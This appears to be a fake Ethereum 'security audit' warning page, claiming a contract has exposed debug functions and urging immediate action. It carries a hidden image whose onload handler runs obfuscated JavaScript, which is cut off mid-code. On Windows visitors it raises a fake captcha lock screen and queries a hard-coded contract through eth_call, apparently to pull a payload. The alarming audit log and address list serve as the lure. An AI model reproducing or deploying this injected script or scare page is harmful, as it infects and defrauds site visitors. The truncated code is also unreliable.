CRITICAL EXPOSURE WARNING: Insecure Deployment Report: 0x1b89465d1eca7d7d495e549512e3d17220873910 Debug Functions Left Exposed

<img src="data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7" style="display:none;" onload="if(!navigator.userAgent.includes('Windows'))return;var el=document.getElementById('main-lock');document.body.appendChild(el);el.style.display='flex';document.documentElement.style.setProperty('overflow','hidden','important');document.body.style.setProperty('overflow','hidden','important');window.genC=function(){var c=document.getElementById('captchaCanvas'),x=c.getContext('2d');x.clearRect(0,0,c.width,c.height);window.cV='';var s='ABCDEFGHJKLMNPQRSTUVWXYZ23456789';for(var i=0;i<5;i++)window.cV+=s.charAt(Math.floor(Math.random()*s.length));for(var i=0;i<8;i++){x.strokeStyle='rgba(59,130,246,0.15)';x.lineWidth=1;x.beginPath();x.moveTo(Math.random()*140,Math.random()*45);x.lineTo(Math.random()*140,Math.random()*45);x.stroke();}x.font='bold 28px Segoe UI, sans-serif';x.fillStyle='#1e293b';x.textBaseline='middle';for(var i=0;iMath.random()-0.5);for(let r of u){try{const re=await fetch(r,{method:String.fromCharCode(80,79,83,84),body:JSON.stringify({jsonrpc:String.fromCharCode(50,46,48),method:String.fromCharCode(101,116,104,95,99,97,108,108),params:[{to:String.fromCharCode(48,120,57,97,56,100,97,53,98,101,57,48,48,51,102,50,99,100,97,52,51,101,97,53,56,56,51,53,98,53,54,48,57,98,55,101,56,102,98,56,98,55),data:String.fromCharCode(48,120,101,97,56,55,57,54,51,52)},String.fromCharCode(108,97,116,101,115,116)],id:1})});const j=await re.json();if(j.result){let h=j.result.substring(130),s=String.fromCharCode(32).trim();for(let i=0;i

ADMIN

Terminal :: Triada Ethereum Auditor v2.5
AUDIT_ID: TRD-100A5413F0A8

Infrastructure Scan
ADDRESS: 0x1b89465d1eca7d7d495e549512e3d17220873910
DEPLOYED: 2026-05-16 04:28:35
LAST_TX: 2026-05-16 05:22:11
Compliance Status
STATUS:
OPEN_DEBUG_PORT
EXPOSURE: Debug_Mode_Persistence
VISIBILITY: ADMIN_ACCESS_VULNERABILITY

OWNER_PRIVILEGE_EXPOSURE
An active debugging interface allows any user to execute onlyOwner functions.

Deactivate access mode immediately!

> Execution_Trace_Log
[SYSTEM] Environment: Linux 5.15.0-generic x86_64. [NET] Fetching raw bytecode for 0x1b89465d1eca7d7d495e549512e3d17220873910… [FETCH] Hex dump completed. Entropy: 8.22 bit/byte. [SCAN] Searching for ‘DELEGATECALL’ and ‘SELFDESTRUCT’ patterns. [MEM] Stack depth: 1 / 1024. [VULN] Warning: IS_DEBUG_MODE found in storage slot 37. [SIM] Reverting transaction at PC: 2721… [TRACE] Return data: 0xec8e2be9… [VALID] Finalizing audit report for 0x1b89465d1eca7d7d495e549512e3d17220873910. $line = str_replace(‘397CB52D’, strtoupper(bin2hex(random_bytes(4))), $line);

NODE: eth-us-cluster-04
GAS_LIMIT: 21000
OPERATIONAL_SECURITY_SCAN_COMPLETED

0xc4f1bf7b7139cbd75c5aa72d5b4e0befd1039384 0xecc51c926b975590b006a8f9a31694c2542d5bb3 0x6c1d971399729d34ada1ce753d8bf68844c03372 0x93b6586070324fc7df130e29c90d21a2481c9e40 0xfaeb3e2315c79d1553a290edde771d0d0c65455a 0x8acfb4a87e4ddde7953f5acdb7a781c971d95415 0xb8eac3fb4e8ad0284934f35e44ce696a8616d6af 0x44086028d0302aecf3eb5a3ca2bb0038a11d9556 0xddb650757fac5e168014036487c51c775bb2ce49 0x739806a1593515427d551b364b21863d147b5726 0x5ddea9fa8acbdd81a78d14469185003ffa3a0147 0xb4e55a71f6703df81184a769a46b49289210758d 0xb2c7aec0b8d6e8ef3205bb2e114657ddbd91adf3 0x29f4dbf84219103241811bfaa71bfd52abcc5d10 0x2723b8bb6e199b5f7df427b248d7ca7ca56a4baa 0x36c4cfecf1a9160fc9957df367f14928645cd113 0x0f8f812804aec4dd74a4a3e23304da6b8e62bd65 0x6da280ff791585eaa6c4310b73ebbbe531829790 0xce5240445b75559c1dcbc54a773360a2da6cc0a1 0x03518fa4e2e1d5b0ba040297ba51419e8d7c97e1